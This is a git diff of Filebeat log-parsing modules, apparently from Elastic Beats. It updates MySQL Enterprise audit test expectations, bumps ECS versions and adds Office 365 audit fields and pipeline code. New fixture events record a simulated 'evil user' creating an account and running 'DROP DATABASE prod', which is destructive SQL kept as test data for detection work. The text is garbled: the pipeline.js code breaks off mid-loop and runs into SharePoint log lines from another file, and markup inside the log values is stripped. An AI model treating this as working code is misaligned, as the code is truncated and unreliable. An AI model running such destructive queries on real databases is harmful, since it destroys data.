+748,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:25\", \"id\": 1, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"select\", \"query\": \"select @@version_comment limit 1\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -679,7 +757,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 6638, + "log.offset": 6652, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Query", @@ -689,6 +767,9 @@ "mysqlenterprise.audit.id": 1, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -712,6 +793,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:31\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"create_db\", \"query\": \"create database audit_test\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -720,7 +802,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 7020, + "log.offset": 7034, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Query", @@ -730,6 +812,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -753,6 +838,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:40\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"select\", \"query\": \"SELECT DATABASE()\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -761,7 +847,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 7399, + "log.offset": 7413, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Query", @@ -771,6 +857,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -794,6 +883,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:40\", \"id\": 1, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Init DB\", \"sql_command\": \"error\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -802,7 +892,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 7766, + "log.offset": 7780, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Init DB", @@ -811,6 +901,9 @@ "mysqlenterprise.audit.id": 1, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -834,6 +927,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:40\", \"id\": 2, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"show_databases\", \"query\": \"show databases\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -842,7 +936,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 8104, + "log.offset": 8118, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Query", @@ -852,6 +946,9 @@ "mysqlenterprise.audit.id": 2, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -875,6 +972,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:40\", \"id\": 3, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"show_tables\", \"query\": \"show tables\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -883,7 +981,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 8476, + "log.offset": 8490, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Query", @@ -893,6 +991,9 @@ "mysqlenterprise.audit.id": 3, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -916,6 +1017,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:47\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"create_table\", \"query\": \"CREATE TABLE audit_test_table (firstname VARCHAR(20), lastname VARCHAR(20))\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -924,7 +1026,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 8842, + "log.offset": 8856, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Query", @@ -934,6 +1036,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -957,6 +1062,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:57\", \"id\": 0, \"class\": \"table_access\", \"event\": \"insert\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"table_access_data\": { \"db\": \"audit_test\", \"table\": \"audit_test_table\", \"query\": \"INSERT INTO audit_test_table values ('John', 'Smith')\", \"sql_command\": \"insert\" } },", "event.outcome": "unknown", "event.timezone": "-02:00", "event.type": [ @@ -965,7 +1071,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 9273, + "log.offset": 9287, "mysqlenterprise.audit.class": "table_access", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.id": 0, @@ -975,6 +1081,9 @@ "mysqlenterprise.audit.table_access_data.sql_command": "insert", "mysqlenterprise.audit.table_access_data.table": "audit_test_table", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -998,6 +1107,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:57\", \"id\": 1, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"insert\", \"query\": \"INSERT INTO audit_test_table values ('John', 'Smith')\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -1006,7 +1116,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 9702, + "log.offset": 9716, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Query", @@ -1016,6 +1126,9 @@ "mysqlenterprise.audit.id": 1, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -1039,6 +1152,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:32:05\", \"id\": 0, \"class\": \"table_access\", \"event\": \"read\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"table_access_data\": { \"db\": \"audit_test\", \"table\": \"audit_test_table\", \"query\": \"select * from audit_test_table\", \"sql_command\": \"select\" } },", "event.outcome": "unknown", "event.timezone": "-02:00", "event.type": [ @@ -1047,7 +1161,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 10105, + "log.offset": 10119, "mysqlenterprise.audit.class": "table_access", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.id": 0, @@ -1057,6 +1171,9 @@ "mysqlenterprise.audit.table_access_data.sql_command": "select", "mysqlenterprise.audit.table_access_data.table": "audit_test_table", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -1080,6 +1197,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:32:05\", \"id\": 1, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"select\", \"query\": \"select * from audit_test_table\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -1088,7 +1206,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 10509, + "log.offset": 10523, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Query", @@ -1098,6 +1216,9 @@ "mysqlenterprise.audit.id": 1, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -1121,6 +1242,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:32:10\", \"id\": 0, \"class\": \"connection\", \"event\": \"disconnect\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"connection_data\": { \"connection_type\": \"ssl\" } },", "event.outcome": "unknown", "event.timezone": "-02:00", "event.type": [ @@ -1130,13 +1252,16 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 10889, + "log.offset": 10903, "mysqlenterprise.audit.class": "connection", "mysqlenterprise.audit.connection_data.connection_type": "ssl", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -1159,6 +1284,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:32:12\", \"id\": 0, \"class\": \"connection\", \"event\": \"disconnect\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"connection_data\": { \"connection_type\": \"socket\" } },", "event.outcome": "unknown", "event.timezone": "-02:00", "event.type": [ @@ -1168,13 +1294,16 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 11204, + "log.offset": 11218, "mysqlenterprise.audit.class": "connection", "mysqlenterprise.audit.connection_data.connection_type": "socket", "mysqlenterprise.audit.connection_id": 15, "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -1193,11 +1322,12 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:32:16\", \"id\": 0, \"class\": \"audit\", \"event\": \"shutdown\", \"connection_id\": 0, \"shutdown_data\": { \"server_id\": 1 } }", "event.outcome": "unknown", "event.timezone": "-02:00", "fileset.name": "audit", "input.type": "log", - "log.offset": 11486, + "log.offset": 11500, "mysqlenterprise.audit.class": "audit", "mysqlenterprise.audit.connection_id": 0, "mysqlenterprise.audit.id": 0, @@ -1207,5 +1337,146 @@ "tags": [ "mysqlenterprise-audit" ] + }, + { + "@timestamp": "2021-02-10T19:05:42.000Z", + "client.domain": "elastic", + "client.ip": "192.168.7.76", + "event.action": "mysql-status", + "event.category": [ + "database", + "iam" + ], + "event.dataset": "mysqlenterprise.audit", + "event.kind": "event", + "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2021-02-10 19:05:42\", \"id\": 2, \"class\": \"audit\", \"event\": \"status\", \"connection_id\": 42, \"account\": { \"user\": \"adrian\", \"host\": \"elastic\" }, \"login\": { \"user\": \"adrian\", \"os\": \"\", \"ip\": \"192.168.7.76\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"create_user\", \"query\": \"crEAtE uSeR 'evil user'@elastic IDENTIFIED BY \", \"status\": 1396 } },", + "event.outcome": "failure", + "event.timezone": "-02:00", + "event.type": [ + "user", + "creation" + ], + "fileset.name": "audit", + "input.type": "log", + "log.offset": 11644, + "mysqlenterprise.audit.class": "audit", + "mysqlenterprise.audit.connection_id": 42, + "mysqlenterprise.audit.general_data.command": "Query", + "mysqlenterprise.audit.general_data.query": "crEAtE uSeR 'evil user'@elastic IDENTIFIED BY ", + "mysqlenterprise.audit.general_data.sql_command": "create_user", + "mysqlenterprise.audit.general_data.status": 1396, + "mysqlenterprise.audit.id": 2, + "mysqlenterprise.audit.login.user": "adrian", + "process.name": "mysqld", + "related.hosts": [ + "elastic" + ], + "related.ip": [ + "192.168.7.76" + ], + "related.user": [ + "adrian", + "evil user" + ], + "server.user.name": "adrian", + "service.type": "mysqlenterprise", + "tags": [ + "mysqlenterprise-audit" + ], + "user.name": "adrian", + "user.target.domain": "elastic", + "user.target.name": "evil user" + }, + { + "@timestamp": "2021-02-10T19:05:42.000Z", + "client.domain": "elastic", + "client.ip": "192.168.7.76", + "event.action": "mysql-status", + "event.category": [ + "database" + ], + "event.dataset": "mysqlenterprise.audit", + "event.kind": "event", + "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2021-02-10 19:05:42\", \"id\": 2, \"class\": \"audit\", \"event\": \"status\", \"connection_id\": 42, \"account\": { \"user\": \"adrian\", \"host\": \"elastic\" }, \"login\": { \"user\": \"evil user\", \"os\": \"\", \"ip\": \"192.168.7.76\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"drop_db\", \"query\": \"DROP DATABASE prod\", \"status\": 1396 } },", + "event.outcome": "failure", + "event.timezone": "-02:00", + "fileset.name": "audit", + "input.type": "log", + "log.offset": 12034, + "mysqlenterprise.audit.class": "audit", + "mysqlenterprise.audit.connection_id": 42, + "mysqlenterprise.audit.general_data.command": "Query", + "mysqlenterprise.audit.general_data.query": "DROP DATABASE prod", + "mysqlenterprise.audit.general_data.sql_command": "drop_db", + "mysqlenterprise.audit.general_data.status": 1396, + "mysqlenterprise.audit.id": 2, + "mysqlenterprise.audit.login.user": "evil user", + "process.name": "mysqld", + "related.hosts": [ + "elastic" + ], + "related.ip": [ + "192.168.7.76" + ], + "related.user": [ + "adrian" + ], + "server.user.name": "adrian", + "service.type": "mysqlenterprise", + "tags": [ + "mysqlenterprise-audit" + ] + }, + { + "@timestamp": "2021-02-10T19:05:42.000Z", + "client.domain": "elastic", + "client.ip": "192.168.7.76", + "event.action": "mysql-status", + "event.category": [ + "database", + "iam" + ], + "event.dataset": "mysqlenterprise.audit", + "event.kind": "event", + "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2021-02-10 19:05:42\", \"id\": 2, \"class\": \"audit\", \"event\": \"status\", \"connection_id\": 42, \"account\": { \"user\": \"adrian\", \"host\": \"elastic\" }, \"login\": { \"user\": \"evil user\", \"os\": \"\", \"ip\": \"192.168.7.76\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"drop_user\", \"query\": \"DrOp usEr IF EXISTS 'evil user'@%\", \"status\": 1396 } },", + "event.outcome": "failure", + "event.timezone": "-02:00", + "event.type": [ + "user", + "deletion" + ], + "fileset.name": "audit", + "input.type": "log", + "log.offset": 12385, + "mysqlenterprise.audit.class": "audit", + "mysqlenterprise.audit.connection_id": 42, + "mysqlenterprise.audit.general_data.command": "Query", + "mysqlenterprise.audit.general_data.query": "DrOp usEr IF EXISTS 'evil user'@%", + "mysqlenterprise.audit.general_data.sql_command": "drop_user", + "mysqlenterprise.audit.general_data.status": 1396, + "mysqlenterprise.audit.id": 2, + "mysqlenterprise.audit.login.user": "evil user", + "process.name": "mysqld", + "related.hosts": [ + "elastic" + ], + "related.ip": [ + "192.168.7.76" + ], + "related.user": [ + "adrian", + "evil user" + ], + "server.user.name": "adrian", + "service.type": "mysqlenterprise", + "tags": [ + "mysqlenterprise-audit" + ], + "user.name": "adrian", + "user.target.domain": "%", + "user.target.name": "evil user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/netflow/log/config/netflow.yml b/x-pack/filebeat/module/netflow/log/config/netflow.yml index 68b7b43feb5f..65baa78eaacf 100644 --- a/x-pack/filebeat/module/netflow/log/config/netflow.yml +++ b/x-pack/filebeat/module/netflow/log/config/netflow.yml @@ -38,4 +38,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/netscout/sightline/config/input.yml b/x-pack/filebeat/module/netscout/sightline/config/input.yml index cc3b20640245..8174816245b9 100644 --- a/x-pack/filebeat/module/netscout/sightline/config/input.yml +++ b/x-pack/filebeat/module/netscout/sightline/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/o365/audit/_meta/fields.yml b/x-pack/filebeat/module/o365/audit/_meta/fields.yml index 7d3311fb20cd..e107c3a23767 100644 --- a/x-pack/filebeat/module/o365/audit/_meta/fields.yml +++ b/x-pack/filebeat/module/o365/audit/_meta/fields.yml @@ -4,6 +4,9 @@ description: > Fields from Office 365 Management API audit logs. fields: + - name: AADGroupId + type: keyword + - name: Actor type: array fields: @@ -71,6 +74,9 @@ type: text norms: false + - name: CommunicationType + type: keyword + - name: CorrelationId type: keyword @@ -86,9 +92,15 @@ - name: DataType type: keyword + - name: DoNotDistributeEvent + type: boolean + - name: EntityType type: keyword + - name: ErrorNumber + type: keyword + - name: EventData type: keyword @@ -104,6 +116,9 @@ - name: ExternalAccess type: keyword + - name: FromApp + type: boolean + - name: GroupName type: keyword @@ -125,21 +140,42 @@ - name: IntraSystemId type: keyword + - name: IsDocLib + type: boolean + - name: Item.* type: object - name: Item.*.* type: object + - name: ItemCount + type: long + - name: ItemName type: keyword - name: ItemType type: keyword + - name: ListBaseTemplateType + type: keyword + + - name: ListBaseType + type: keyword + + - name: ListColor + type: keyword + + - name: ListIcon + type: keyword + - name: ListId type: keyword + - name: ListTitle + type: keyword + - name: ListItemUniqueId type: keyword @@ -266,6 +302,9 @@ - name: TeamGuid type: keyword + - name: TemplateTypeId + type: keyword + - name: UniqueSharingId type: keyword diff --git a/x-pack/filebeat/module/o365/audit/config/input.yml b/x-pack/filebeat/module/o365/audit/config/input.yml index 72e13c42c687..11c7be4fc703 100644 --- a/x-pack/filebeat/module/o365/audit/config/input.yml +++ b/x-pack/filebeat/module/o365/audit/config/input.yml @@ -38,6 +38,11 @@ publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} processors: {{ if eq .input "file" }} + - rename: + fields: + - from: json.error + to: error + ignore_missing: true - rename: fields: - from: json @@ -62,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/o365/audit/config/pipeline.js b/x-pack/filebeat/module/o365/audit/config/pipeline.js index 5d314822af63..dd1fe588e9e5 100644 --- a/x-pack/filebeat/module/o365/audit/config/pipeline.js +++ b/x-pack/filebeat/module/o365/audit/config/pipeline.js @@ -191,8 +191,113 @@ function exchangeAdminSchema(debug) { return builder.Build(); } -function azureADLogonSchema(debug) { +function typeMapEnrich(conversions) { + return function (evt) { + var action = evt.Get("event.action"); + if (action != null && conversions.hasOwnProperty(action)) { + var conv = conversions[action]; + if (conv.action !== undefined) evt.Put("event.action", conv.action); + if (conv.category !== undefined) evt.Put("event.category", conv.category); + if (conv.type !== undefined) evt.Put("event.type", conv.type); + var n = conv.copy !== undefined? conv.copy.length : 0; + for (var i=0; iSite Members<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"Everyone except external users"} +{"CreationTime":"2021-02-05T09:07:56","Id":"a9b8277d-d3b9-4d99-0491-08d8c9b5874b","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} +{"CreationTime":"2021-02-05T09:07:56","Id":"dfef0880-e895-47e1-2e39-08d8c9b58733","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Owners"} +{"CreationTime":"2021-02-05T09:07:56","Id":"d9b6f410-30c7-42a0-0820-08d8c9b5872c","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Members<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Members"} +{"CreationTime":"2021-02-05T09:07:56","Id":"5c82c14e-525e-44f4-7cd7-08d8c9b58722","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} +{"CreationTime":"2021-02-05T09:07:56","Id":"f576a30e-1734-4f42-f3b3-08d8c9b58718","Operation":"SiteCollectionCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":4,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"20.190.143.50","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","ApplicationDisplayName":"Microsoft Graph","ApplicationId":"00000006-0000-0ff1-ce00-000000000000","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Site","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","EventData":"O365AdminCenter<\/SiteCreationSource>True<\/TenantSettings.ShowCreateSiteCommand>False<\/TenantSettings.UseCustomSiteCreationForm>"} +{"CreationTime":"2021-02-05T09:07:56","Id":"f84f38b0-1963-4a1d-454e-08d8c9b586e9","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Owners"} +{"CreationTime":"2021-02-05T09:07:55","Id":"e85ec350-af23-47a7-5b33-08d8c9b586be","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} 